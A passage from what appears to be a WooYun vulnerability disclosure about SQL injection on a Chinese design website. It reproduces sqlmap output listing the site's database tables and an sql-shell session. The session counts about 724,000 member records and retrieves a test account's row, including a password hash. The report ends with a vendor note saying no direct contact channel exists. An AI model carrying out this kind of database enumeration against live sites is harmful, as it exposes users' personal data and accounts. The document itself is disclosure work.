| dbo.syncobj_0x3642464642343143 | 51 |
| dbo.syncobj_0x4142353135433642 | 51 |
| dbo.syncobj_0x4244413446434633 | 51 |
| dbo.syncobj_0x4433374335323042 | 51 |
| dbo.vote_Options | 51 |
| dbo.jt_AdminManage | 50 |
| dbo.px_pic | 48 |
| dbo.t_User_Err_List | 48 |
| dbo.DesignBillBoard_Flow | 46 |
| dbo.qt_Student_Contest_Winners_log | 45 |
| dbo.SBH_LinkAndOrg | 44 |
| dbo.tbSubSite | 41 |
| dbo.home_style_bak | 40 |
| dbo.zhuanti_vote | 40 |
| dbo.tb_App_Comment | 39 |
| dbo.ctf_Teacher | 38 |
| dbo.sub_admin | 38 |
| dbo.syncobj_0x3231343633344434 | 38 |
| dbo.syncobj_0x4538334130374631 | 38 |
| dbo.sjz_show | 36 |
| dbo.syncobj_0x3137423536383539 | 36 |
| dbo.syncobj_0x3946374131363844 | 36 |
| dbo.t_Location | 36 |
| dbo.syncobj_0x4236334336444443 | 35 |
| dbo.syncobj_0x4443453732434439 | 35 |
| dbo.tt_Location | 35 |
| dbo.Index_DesignShow | 33 |
| dbo.syncobj_0x3643353431313032 | 33 |
| dbo.syncobj_0x4635384541364536 | 33 |
| dbo.sub_yunyingjigou | 30 |
| dbo.philips_Design | 29 |
| dbo.tbCompetition | 27 |
| dbo.Designer_label_Typebak2012013 | 26 |
| dbo.Designer_label_Type | 25 |
| dbo.Contest_Awards | 24 |
| dbo.tbGetCalendar | 24 |
| dbo.blog_Category | 23 |
| dbo.SouFun_Index_Img | 23 |
| dbo.syncobj_0x3338414535363437 | 23 |
| dbo.syncobj_0x3430434341413342 | 23 |
| dbo.hfl_project | 22 |
| dbo.tb_App_Project_Index | 22 |
| dbo.Index_Book | 21 |
| dbo.syncobj_0x3439373831353438 | 21 |
| dbo.syncobj_0x3641364341353544 | 21 |
| dbo.App_AD | 20 |
| dbo.blog_rec_author | 19 |
| dbo.Index_AdType | 19 |
| dbo.syncobj_0x3532443735364142 | 19 |
| dbo.syncobj_0x3537454232434146 | 19 |
| dbo.syncobj_0x3631334544323839 | 19 |
| dbo.syncobj_0x3832423432384545 | 19 |
| dbo.syncobj_0x3937344646423442 | 19 |
| dbo.syncobj_0x4241423443353936 | 19 |
| dbo.syncobj_0x4246313243323443 | 19 |
| dbo.syncobj_0x4642304535373342 | 19 |
| dbo.t_Count | 19 |
| dbo.t_owner_Project_Pic | 19 |
| dbo.t_pic_type | 19 |
| dbo.v_tuijian_ZL | 19 |
| dbo.Index_Region | 18 |
| dbo.tb_App_Like | 18 |
| dbo.blogorg_Category | 16 |
| dbo.tbTempPassWord | 16 |
| dbo.DesignBillBoard_News | 13 |
| dbo.home_module | 13 |
| dbo.syncobj_0x3037463641324346 | 13 |
| dbo.syncobj_0x3933454230353246 | 13 |
| dbo.philips_imgnews | 12 |
| dbo.t_remark | 12 |
| dbo.t_user_PassWord_Back_log | 12 |
| dbo.ctf_smallClass | 11 |
| dbo.syncobj_0x3237373741303233 | 11 |
| dbo.syncobj_0x3834393332333241 | 11 |
| dbo.tbDesignerPartyVote | 11 |
| dbo.SBH_NewsClass | 10 |
| dbo.syncobj_0x3732313730433746 | 10 |
| dbo.syncobj_0x3738454346433644 | 10 |
| dbo.t_zhitou | 10 |
| dbo.tb_App_PollStatis | 10 |
| dbo.DesignBillBoard | 9 |
| dbo.Manage_user | 9 |
| dbo.syncobj_0x3731364635413039 | 9 |
| dbo.syncobj_0x4134373732304136 | 9 |
| dbo.t_User_App_Admin_RoleID | 9 |
| dbo.DesignBillBorad_Award | 8 |
| dbo.Home_Format | 8 |
| dbo.RePassWord_Other | 8 |
| dbo.syncobj_0x3030334130424142 | 8 |
| dbo.syncobj_0x3736373231383442 | 8 |
| dbo.syncobj_0x4336374439463334 | 8 |
| dbo.syncobj_0x4443453443323634 | 8 |
| dbo.tb_App_Bookmark | 8 |
| dbo.tt_Job | 8 |
| dbo.jt_Books | 7 |
| dbo.px_lesson | 7 |
| dbo.syncobj_0x4142414544343444 | 7 |
| dbo.syncobj_0x4339453037363530 | 7 |
| dbo.tb_App_Invite | 7 |
| dbo.vote_Info | 7 |
| dbo.philips_arctype | 6 |
| dbo.t_user_PassWord_Back | 6 |
| dbo.UploadFielConfig | 6 |
| dbo.Activity_MemClass | 5 |
| dbo.philips_guest | 5 |
| dbo.t_user_Err | 5 |
| dbo.ADAdmin | 4 |
| dbo.ctf_bigClass | 4 |
| dbo.philips_DownType | 4 |
| dbo.syncobj_0x3741373537423345 | 4 |
| dbo.syncobj_0x4336443739304436 | 4 |
| dbo.T_Last_view_time | 4 |
| dbo.t_User_App_Admin | 4 |
| dbo.Activity_intent | 3 |
| dbo.ctf_admin | 3 |
| dbo.Index_News | 3 |
| dbo.qt_action | 3 |
| dbo.SBH_AdminUser | 3 |
| dbo.syncobj_0x3136413235434336 | 3 |
| dbo.syncobj_0x3246313345353533 | 3 |
| dbo.syncobj_0x3446393732364436 | 3 |
| dbo.syncobj_0x3838364133413346 | 3 |
| dbo.t_User_App_Admin_Account | 3 |
| dbo.t_user_App_Admin_Other | 3 |
| dbo.t_User_App_Role | 3 |
| dbo.tbEasySelectionRecommend | 3 |
| dbo.sub_NewsClass | 2 |
| dbo.tb_App_Entrust | 2 |
| dbo.tb_SMSCount | 2 |
| dbo.WeiBoType | 2 |
| dbo.Activity_mess | 1 |
| dbo.jt_Order | 1 |
| dbo.jt_Order_Items | 1 |
| dbo.philips_cnm | 1 |
| dbo.syncobj_0x3444323736353441 | 1 |
| dbo.syncobj_0x4145454530373342 | 1 |
| dbo.t_dirtystr | 1 |
| dbo.tb_App_Entrust_RE | 1 |
+------------------------------------+---------+


[21:42:30] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' an
d press ENTER
sql-shell> select count(*) from t_user
[21:43:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) f
rom t_user'
[21:43:00] [INFO] retrieved: 724594
select count(*) from t_user: '724594'


为了确认是否该表就是设计师表,于是以wooyun@126.com邮箱注册了一个账号,测试结果显示此表正是网站的会员表.

select * from t_user where email='wooyun@126.com' [1]:
[*] 1084743, wooyuntest, , wooyun@126.com, 0, , 0, 1, 0, 0, 0, 5648606D4E189B25,
, 07 17 2015 \\?a0\\?38:33PM, , , , 0, 0, 0, 1, 0, 0, 0, 1, 0, , 01 \\?a0\\?31
1900 12:00AM, 0, 0, 0, 1, , 01 \\?a0\\?31 1900 12:00AM, 0, 0,


捕获.JPG


修复方案:

你懂的

版权声明:转载请注明来源 安全小飞侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-24 08:17

厂商回复:

暂未建立与网站管理单位的直接处置渠道,尝试邮件通报其网站域名所有者.

最新状态:

暂无


漏洞评价:

评论